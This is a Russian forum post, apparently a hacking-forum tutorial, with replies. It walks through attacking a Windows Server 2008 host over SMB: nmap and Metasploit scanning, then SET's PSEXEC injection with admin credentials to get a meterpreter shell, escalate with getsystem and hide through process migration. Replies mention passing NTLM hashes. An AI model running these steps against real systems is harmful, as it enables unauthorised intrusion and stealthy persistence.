|
Всем привет! В этой статье я опишу процедуру тестирования на проникновение целевого хоста под управлением Windows Server 2008.
https://forum.antichat.xyz/attachmen...cbca112a00.png Целью будет получение активной сессии meterpreter, на компьютере тестирующего. В качестве платформы для проведения теста, мною будет использоваться Kali Linux 2016.2. Итак, для начала немного информации, атака будет производиться используя уязвимости версии протокола SMB 2.2 SMB (Server Message Block) — сетевой протокол прикладного уровня для удалённого доступа к файлам, принтерам и другим сетевым ресурсам, а также для межпроцессорного взаимодействия. Подвергаться эксплуатации в нашем случае будет 445 порт. 445/TCP,UDP MICROSOFT-DS — используется в Microsoft Windows 2000 и поздних версий, для прямого TCP/IP-доступа без использования NetBIOS. Узнаем адрес сервера в сети и начнем со сканирования: > nmap –sV –A 192.168.31.133 https://forum.antichat.xyz/attachmen...ea920ca089.png Первый положительный момент выделен, на сервере открыт интересующий нас порт. https://forum.antichat.xyz/attachmen...c52d88e6eb.png Второй момент, это наличие включенного сервиса smbv2. Теперь необходимо узнать больше о версии протокола SMB. Запустим Metasploit Framework и выполним последовательно следующее: > use auxiliary/scanner/smb/smb_version > msf exploit (smb_version)>set rhosts 192.168.31.ХХХ > msf exploit (smb_version)>exploit https://forum.antichat.xyz/attachmen...6fa2ab7e50.png Затем выполним: > use auxiliary/scanner/smb/smb2 > msf exploit (smb2)>set rhosts 192.168.0.XXX > msf exploit (smb2)>set rport 445 > msf exploit (smb2)>exploit https://forum.antichat.xyz/attachmen...d112df59d6.png Версия протокола и его наличие нам стали известны. Теперь можно переходить непосредственно к проникновению. Запускаем SET - Social Engineering Toolkit. > setoolkit https://forum.antichat.xyz/attachmen...f2050b6016.png Выбираем второй пункт (2): https://forum.antichat.xyz/attachmen...a1f23ea4d1.png Будем использовать PSEXEC Injection, выбираем (6): https://forum.antichat.xyz/attachmen...90db7bdd94.png Вводим данные согласно требованиям SET: > 192.168.31.133 (Адрес целевого хоста) > Administrator (Логин целевого хоста) > Adminroot123 (Пароль целевого хоста) > Следующий пункт пропускаем, жмем Enter > Следующий пункт пропускаем, жмем Enter > 192.168.31.201 (Адрес атакующей машины) > 445 (SMB порт) https://forum.antichat.xyz/attachmen...d8a0dedf81.png Если все прошло успешно, то в течение нескольких секунд запустится Metasploit, а затем откроется сессия meterpreter для доступа на целевой хост. https://forum.antichat.xyz/attachmen...8b1bc2d190.png Проверяем работоспособность эксплойта и получаем системные привилегии: > sessions –I 1 > sysinfo > getsystem https://forum.antichat.xyz/attachmen...270df46459.png Посмотрим список запущенных процессов: > ps https://forum.antichat.xyz/attachmen...f2a4e876f5.png Сам сервер, во время манипуляций ведет себя тихо, разве, что в tasklist появятся новые процессы, но с помощью миграции все поправимо: https://forum.antichat.xyz/attachmen...1263df1d1d.png Дальше действуем на свое усмотрение. В целом, на этом все. Спасибо за внимание. |
Т.е для эксплуатации данной уязвимости необходимо иметь логин и пароль пользователя данного ПК ? Как то не айс Кто ж нам добровольно отдаст учётные данные
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Можно ставить хэш |
А как быть с WIndows Server 2008 R2 x86 и x64...
[doublepost=1498899695,1495876146][/doublepost]У меня тоже с русскоязычным username проблема, если хеш NTLM вставить как быть с SMBUser при использовании psexec... |
| Время: 15:28 |